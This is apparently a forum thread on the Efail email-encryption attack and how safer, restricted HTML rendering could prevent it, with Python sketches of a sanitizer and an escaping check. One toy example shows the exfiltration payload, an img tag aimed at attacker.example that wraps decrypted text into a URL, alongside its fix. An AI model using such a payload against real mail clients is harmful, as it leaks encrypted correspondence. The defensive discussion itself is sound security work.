1. 7
  1. 3

    HTML email is problematic indeed. But entirely opting out of it is difficult. My favourite example is eBay; its automatic emails are just plain impossible to read without parsing the HTML.

    What bugs me about the discussion of Efail and HTML email is that it’s always all-or-nothing. Either you accept reality and live with HTML email, or you reject it and go plain text. My opinion is that neither is the correct way. What we need is a new standard: a standard for formatted email that does not expose the difficulties and dangers of HTML email, yet allows more formatting than plain text. Before someone mentions this XKCD, I want to point out that HTML email is not even a standard, which is part of the problem.

    I envision this new standard such that it allows things like this:

    • General markup – bold, italic, underline, etc.
    • Inline images based on image data sent with the email (not web images)
    • Letterhead with logo and legally required information; many companies try to abuse HTML email for this. If this is properly defined, then terminal clients can detect that information and simply not show it (e.g. omit the logo).

    The list is not complete, but there are certainly things that should never be on it. For example, this new standard should not allow embedding of remote resources, for privacy and security reasons. Tracking pixels, for example, should be impossible, and without the ability to “phone home”, attacks like Efail are not possible. Similarly, there’s no reason to allow script execution (like JavaScript) in e-mails.

    RFC 3676 (format=flowed) never got widely adopted, and apparently not even Thunderbird gets it right. It also doesn’t address the problem with markup.

    1. 3

      I don’t know if a new standard would be required, beyond just HTML. Nothing says that user agents must implement the whole HTML spec, including fetching remote resources, CSS, etc. Your stripped-down markup format could be implemented right now as a “stripped-down” HTML renderer. For example, I use Emacs and mu4e to read my email, which calls out to w3m to render the page as slightly prettified text (e.g. emphasis, underlines, etc. work; presumably using ANSI terminal escape codes). There’s no reason that’s limited to text though; I’d imagine it’s safe enough to render anything as long as (a) no external resources are fetched (everything must be included in the email, e.g. as MIME parts or data URIs) and (b) the result is inert (nothing clickable, nothing that interacts with external resources, etc.).
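
      To make the “stripped-down HTML renderer” idea concrete, here is a minimal sketch using only Python’s standard `html.parser`. The allowlist, the class name `InertRenderer` and the function `render_inert` are my own assumptions for illustration, not anything mu4e or w3m actually does. It keeps a few formatting tags, drops every attribute, drops links and scripts, and only keeps images whose data travels with the email (`data:` URIs or `cid:` references to MIME parts).

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist: inert formatting tags only (an assumption for this sketch).
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br"}
# Tags whose text content should never be shown.
SKIPPED_TAGS = {"script", "style"}


class InertRenderer(HTMLParser):
    """Re-emits a small, inert subset of HTML and discards everything else."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in SKIPPED_TAGS:
            self._skip_depth += 1
        elif tag in ALLOWED_TAGS:
            # All attributes are dropped, so no style, href or event handlers survive.
            self.out.append(f"<{tag}>")
        elif tag == "img":
            src = dict(attrs).get("src") or ""
            # Only images shipped inside the email itself; never remote URLs.
            if src.startswith(("data:image/", "cid:")):
                self.out.append(f'<img src="{escape(src, quote=True)}">')

    def handle_endtag(self, tag):
        if tag in SKIPPED_TAGS and self._skip_depth:
            self._skip_depth -= 1
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            # Text is re-escaped so it can never turn back into markup.
            self.out.append(escape(data))


def render_inert(html_source):
    renderer = InertRenderer()
    renderer.feed(html_source)
    renderer.close()
    return "".join(renderer.out)
```

      Link text survives but the link itself does not, which matches condition (b): nothing clickable. A real client would need a more carefully chosen allowlist than this one.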

      From the sounds of it, this Efail problem would still pose a couple of problems, even if some new restricted markup format were used. Firstly, part of the trick seems to be a general problem with any delimited markup; e.g. one part contains <a href="... whilst another contains >. That would still be a problem with, say, [x](... and ) in markdown. Whilst it can be mitigated by escaping/quoting discipline, as the article mentions, that requires effort for every implementation. The other problem, exfiltration of decrypted data, seems to me like it would still be problematic for plain text. Even if we have an inert, non-clickable format, people will still want to visit URLs sent via email (e.g. password resets, etc.). Even if we show the entire URL, and force the user to copy/paste it by hand, it might not be obvious that decrypted data has been leaked, for example if it’s something machine-generated and nestled inside an innocuous-looking parameter of an ‘unsubscribe’ URL. I’m not familiar enough with PGP, etc. to know how difficult it would be to outright forbid such things (e.g. forbidding mixed encrypted/non-encrypted messages entirely).
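
      A toy illustration of the first problem, assuming a message made of three parts where only the middle one was encrypted. The function names and the attacker URL are made up for the example. Gluing the parts together before interpreting the markup lets the opening delimiter in one part swallow the next part; handling each part in isolation does not.

```python
from html import escape


def naive_join(parts):
    # Concatenate first, interpret markup afterwards: delimiters can span parts.
    return "".join(parts)


def isolated_join(parts):
    # Escape every part on its own, so no tag or attribute can cross a part boundary.
    return "".join(f"<pre>{escape(part)}</pre>" for part in parts)


# Attacker-controlled plain parts wrapped around a decrypted part (hypothetical data).
parts = [
    '<img src="http://attacker.example/',  # opens an attribute and never closes it
    "SECRET",                              # stands in for the decrypted text
    '">',                                  # closes the attribute and the tag
]

leaky = naive_join(parts)      # one img tag whose URL now contains the secret
contained = isolated_join(parts)  # three separate blocks of inert text
```

      The same shape applies to [x](... and ) in markdown: the fix is not the choice of markup but refusing to let one part's delimiters reach into another.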

    2. 1

      Isn’t Efail an issue because PGP doesn’t consider HTML to be a thing in the first place? Character escaping isn’t exactly a new technology (though of course things are hard). It just feels like the way PGP works is really hacky and just not great.

      In an alternate universe PGP emails have to escape HTML chars, and if the escaping isn’t present (like < shows up anywhere in the email) the email isn’t rendered.
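
      A rough sketch of what that alternate-universe rule could look like, using Python’s standard `html.escape`/`html.unescape`. Both function names are hypothetical and this is not how any real PGP implementation behaves: the sender escapes before encrypting, and the receiver refuses to render a decrypted body that still contains a raw angle bracket.

```python
from html import escape, unescape


def prepare_for_encryption(plaintext):
    # Sender side: escape HTML-significant characters before the text is encrypted.
    return escape(plaintext, quote=True)


def render_decrypted(body):
    # Receiver side: a raw angle bracket means the escaping rule was violated,
    # so the message is not rendered at all (signalled here by None).
    if "<" in body or ">" in body:
        return None
    # Otherwise undo the escaping; the result must be displayed as text only.
    return unescape(body)
```

      For example, `render_decrypted(prepare_for_encryption('a < b'))` gives back `'a < b'`, while `render_decrypted('<img src="x">')` returns `None`.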